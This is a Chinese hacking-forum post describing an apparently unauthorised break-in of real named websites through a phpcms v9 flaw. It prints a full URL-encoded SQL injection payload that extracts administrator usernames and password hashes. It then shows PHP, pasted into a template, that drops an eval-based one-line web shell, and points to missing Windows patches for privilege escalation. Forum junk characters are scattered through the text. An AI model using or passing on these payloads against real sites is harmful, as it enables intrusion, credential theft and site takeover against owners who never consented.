找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 利用phpcms v9 0day拿shell
返回列表 发新帖
查看: 3215|回复: 0
打印 上一主题 下一主题

利用phpcms v9 0day拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-20 08:44:41 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
期末快到了,各种作业啊。。学计算机的伤不起啊。。话说我们有门课很有意思,叫做黑客攻防,期末作业就是黑站,我笑了。。前几天在服务器上嗅探把服务器搞死了,管理员漏洞也补了,写这篇文章单凭记忆,图片较少,还请见谅。

Author:夜行人

From:F4ck Team

# z! {2 L8 L- j8 d

目标站:http://www.ipucom.com/

旁注到一个站点:www.zhongyitong.com有phpcmsv9注射漏洞

百度一下找到该漏洞的利用方法。

直接在该网站注册用户名,然后在该网站域名后加上这段代码就能爆出数据库名

api.php?op=add_favorite&url=xx.oo&title=%2527
- I. J/ B" v$ x) D5 }* o) K5 O                                             % _. w' k" _2 {$ ?* \# D- r1 g! k

8 J5 t' P  z7 v" K  K% |                                + l/ h0 l3 [2 K1 Q2 A. z" C( r

: G3 w& r1 h! G; H% E, ?                                                           ! |" R! ~: p& u  ]6 V6 U" ~

. [: l& \! i# \0 b
5 @5 I6 \2 J: o& O. [$ i7 @, p( Q8 Z5 ]" ]7 Z
9 Y$ F5 W" Y- L  R, k- ^4 t. d
                                                         
8 g1 A7 F& f) F% m: A                                                          4 }* u+ R% M- ]; m6 _

这里可以清楚的看到数据库名和表名,然后把该表名替换一下代码中的表名

api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%

2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select

%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252C

password%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from

%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables

%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from

%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and

%2520%25271%2527%253D%25271


0 k8 d7 `( y0 |0 @, M. f

                                            / k; z! l) G' `6 z( I$ S
" {% C% H1 F! O! k

0 Z# r# f6 M1 N& k. ]) a+ r% R  ]( Q0 [* ~% t, b

帐号密码就出来了,md5解密一下就行了

进入后台, 界面 > 模板管理 > 模板风格 >; W- F6 p+ u. e
  `4 _, p# `/ D( u  ~
; |) z# ~+ [4 L5 L9 `
                                                 ; W9 Z$ W: l2 z

4 c" }- E. b/ Q  S  X9 y3 `, b! w* D+ P) u

1 ?2 m* D( u8 I/ L$ P% V% Q; l
" J% _5 ?* C% J, t5 X! r# b8 J0 o- Q

点击后面的修改,然后把一下代码复制上去保存

<?

$fp = @fopen("c.php", 'a');

@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[zmzsg100])'."\r\n\r\n?".">\r\n");

@fclose($fp);

?>
' d+ J" X: K8 y$ Q, ]" I- X6 k0 E3 y& L  K$ E/ P
9 Q& e& m' k# L& u
! p3 L9 O- ~6 ^" @+ U' u4 D
- [9 o. [9 F" }2 n- a, X6 Z
                                                                         6 I3 b9 J" t9 c# b- }& r2 {8 g
. [4 A/ H. R8 L* ^. L

4 K1 X# |2 O( _2 q/ ]8 [$ t# e6 H: P, p7 T8 C, @/ ~- N' a( I
, W" A+ e) d. S+ i
/ X- N) o8 r2 [! |8 c& X

提交后可视化一下  ?2 M& V4 i! v- M1 }

. t) ?$ j6 W7 \3 S: T9 F( v) U

在网站的根目录就生成了你的一句话木马客户端

http://www.zhongyitong.com/f4ck.php

然后通过控制端连上去就行了。。。

提权貌似很简单,看了下systeminfo

发现没有

KB2503665

KB2592799

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表